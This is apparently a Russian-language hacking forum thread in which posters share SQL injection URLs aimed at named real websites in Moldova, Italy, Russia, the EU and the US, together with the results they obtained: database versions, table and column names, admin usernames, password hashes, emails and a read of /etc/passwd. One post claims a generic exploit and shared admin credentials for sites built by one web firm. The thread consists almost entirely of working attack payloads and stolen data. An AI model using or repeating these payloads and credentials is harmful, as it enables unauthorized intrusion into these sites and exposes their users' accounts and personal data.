Code: http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+users+where+USER_ID=2)--
SHOP. www.russki-shop.de Code: http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+ 4.1.10a-standard-log столбец пароля Code: http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(pwd,0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+ Code: 123 Подбирайте user' а
Ещё один бажный молдавский магазин pacnet.md _http://www.pacnet.md/index.php?page=catalogue&cat_id=4&type_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/* 5.0.44-log и этим всё сказано
PR:4 Code: http://[COLOR=Red]www.ipoteka.md[/COLOR]/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14,15,16/* [email protected]:4.1.19-standard-log:ipoteka_ipoteka PR:4 Code: http://[COLOR=Red]www.rabota.md[/COLOR]/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(char(58),user(),version(),database())/* coruptie@localhost:4.1.21:coruptie_rabota PR:3 Code: http://[COLOR=Red]www.aquasystems.md[/COLOR]/readarticle.php?id=-34+union+select+1,concat_ws(char(58),user(),version(),database()),3/* 6847@localhost:5.0.27:6847 Code: http://[COLOR=Red]www.aquasystems.md[/COLOR]/readarticle.php?id=-34+union+select+1,table_name,3+from+information_schema.tables+limit+1,1/* rgb_members Code: http://[COLOR=Red]www.aquasystems.md[/COLOR]/readarticle.php?id=-34+union+select+1,concat_ws(char(58),name,password),3+from+rgb_members/* OzzZZ:6055322b3c1cc50cef132211ca57aa75
Аргументы и Факты (Молдова) PR:3 Code: http://[COLOR=Red]www.aif.md[/COLOR]/index.php?id=-240+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/* aif@localhost:4.1.14:aif
Италия consunigo.it Code: http://www.consunigo.it/news_dettaglio.php?idn=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16/* 4.0.18-standard:consunigo:root@localhost cai.mo.it Code: http://www.cai.mo.it/soggiorno.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 4.0.27-standard-log:Sql58426_1:[email protected] В табе user нашёл поля id_user,user и email Поле с паролем не нашёл ------------------------------------------------------------------- Powered By Giaretta Immobiliare a Venezia Уязвимость в скрипте sezione.php. Примеры: Code: http://www.giaretta.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* Code: http://www.cadeimiracoli.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* Code: http://www.choosevenice.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* 5.0.27:giaretta:dbuser@localhost
Сайт охотников и рыболовов. Code: http://www.ohota-ribalka.com.ua/sthunt_1.htm?id=-14+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb_users/* + есть открытая админка(без ввода пароля) + есть доступ к phpmyadmin (ссылки запостил в разделе Админки) Тур Агенство Велес-тур Code: http://www.veles-tour.ru/animals.php?animal=-10+union+select+1,2,user()/* 4.0.27-log velestour [email protected]
Италия recensito.net Code: http://www.recensito.net/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/* 4.1.22-standard-log:Sql81530_4:[email protected] centroeinaudi.it Code: http://www.centroeinaudi.it/web/dinamico/sezione.php?id=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10/* 4.1.15-Debian_1ubuntu5-log:centroeinaudi:centroeinaudi@localhost cogepiemonte.it Code: http://www.cogepiemonte.it/news.php?f=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/* 4.0.26-debug:cogepiemonte:cogepiemonte@localhost нашёл лишь табу news editoriaragazzi.com Code: http://www.editoriaragazzi.com/sezione.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/* 5.0.45-community-log:Sql137750_5:[email protected]
PR:4 Code: http://[COLOR=Red]www.inmerc.nl[/COLOR]/product.php?id=32&cid=&artikelno=-5422+union+select+1,2,3,4,5,concat_ws(char(58),user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* inmerc@localhost:5.0.37:inmerc
http://www.carvip.ru/autocatalog/?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3/* 5.0.41/carvip_new/carvip_new@localhost ------------------------------------------------------------------------------ http://www.cinema.variety.ru/actors.php?cid=2&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13/* 4.0.27-standard-log/variety_dvd/variety_dvd@localhost ------------------------------------------------------------------------------ http://stroyka.yandoo.ru/?sub=board&act=full&id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14/* 4.1.22/yandoo/yandoo@localhost ------------------------------------------------------------------------------ http://specserver.com/rus/notice.asp?groupID=-1+or+1=@@version Microsoft SQL Server 2005 - 9.00.3159.00 (X64) Mar 23 2007 20:11:35 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+system_user)-- specserver-2 http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+db_name())-- specserver-2
Code: http://culinary.org.ua/index.php?act=cat&id=-7+UNION+SELECT+1,2,3,4,version()/* http://referat.findplace.ru/?id=-600+union+select+1/*
sportspb.ru http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/* 4.1.7-log/newsportspb/newsport@localhost http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,login,pass,email)+from+user+limit+0,1/* логин/хеш/мейл jtsport/f4f068e71e0d87bf0ad51e6214ab84e9/[email protected] ----------------------------------------------------------------------------- http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2) http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+system_user) kdoru http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+db_name()) kdoru http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('tblGuestName','tblSmut','ARTICLES','BANNERS','CAT_GOODS','CAT_TOPIC','CONFIG_VAR','dtproperties','kdo_ddu_arenda','kdo_ddu_arenda_snimu')) и тд.
PR:5 Code: http://www.neurope.eu/view_news.php?id=-77501+union+select+1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* neweuro_kostas@localhost:4.1.22-standard:neweuro_corporate PR:3 Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(char(58),user(),version(),database())/* itbgeu_itbgeu@localhost:5.0.45:itbgeu_itbg Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,table_name+from+information_schema.tables/* Выводится очень удобно ) Code: admin users email ip forum_auth_access forum_users ibp_members ibp_moderators moderator ... Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,column_name+from+information_schema.columns/* Code: id name email ip_address username user_password user_email user_icq user ip ... Лень ковырятся ( PR:3 Code: http://www.mypoolpal.eu/kiallitas/kiallitas.php?id=-1+union+select+1,2,concat_ws(char(58),user(),version(),database())/* mypoolpal@localhost:4.1.21-standard:mypoolpal Code: http://www.mortarinvestments.eu/vehicle.php?id=-119+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8/* [email protected]:5.0.44-log:zbozi_mortarinvestments_eu
DFA-link - Боян -------удалено-------- Washington City Paper Code: http://www.washingtoncitypaper.com/display.php?id=34079-1 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+
http://www.abt.org/ - American Ballet Theatre - Балет Пиндосов. Code: http://www.abt.org/insideabt/news_display.asp?News_ID=1+or+1=(SELECT+TOP+1+cast(C_Username+as+nvarchar)%2B%27%3A%27%2Bcast(C_Password+as+nvarchar)+from+CMS_USER+WHERE+CMS_USER_ID=2)-- http://www.gettysburg.travel Первый раз вижу сайт .travel... Code: http://www.gettysburg.travel/media/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(user_id+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+tbl_user)--
http://www.kenandogulu.com.tr/fun/detay.asp?id=0+union+select+0,1,2+from+ помогите подобрать сайт певца
fantasy-earth.ru http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8/* 5.0.41/fe_site/fe_site@localhost http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,user,Password),5,6,7,8 +from+mysql.user+limit+0,1/* root/*7A75BB29F5CE202812218EEB56693A57AE394396 http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,EMAIL),5,6,7,8+from +alter_odon.b_user/* admin/e10adc3949ba59abbe56e057f20f883e/[email protected] http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,USE_MD5),5,6,7,8+from +alter_odon.b_mail_mailbox+limit+0,1/* test/6de+uCiE/N еще присутствует IP.Board 2.2.2, но чет я так и не нашел где там хранятся юзверские пароли Оо поройтесь кому интересно: http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,column_name,table_name,table_schema),5,6,7,8+from+information_schema.columns+where+column_name='password'/* все таблицы где есть колонка password
http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree" Code: http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)-- Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id=" . В основном "xxx_list.asp?id=". Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+n varchar)+from+admins)-- Логи и пароль кстати тоже всегда одинаковые - guillaume : plop Примеры: http://www.chiefinspiration.com Code: http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://www.benoitoctave.com/ Code: http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://travel.youressentialmix.com Code: http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://tv.blogilvy.be/ Code: http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.wagerweb.com Code: http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,user(),4,version(),6 Code: http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,table_name,6+from+information_schema.tables/* http://www.transporte3.com Code: http://www.transporte3.com/noticias/index.php?num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9/*
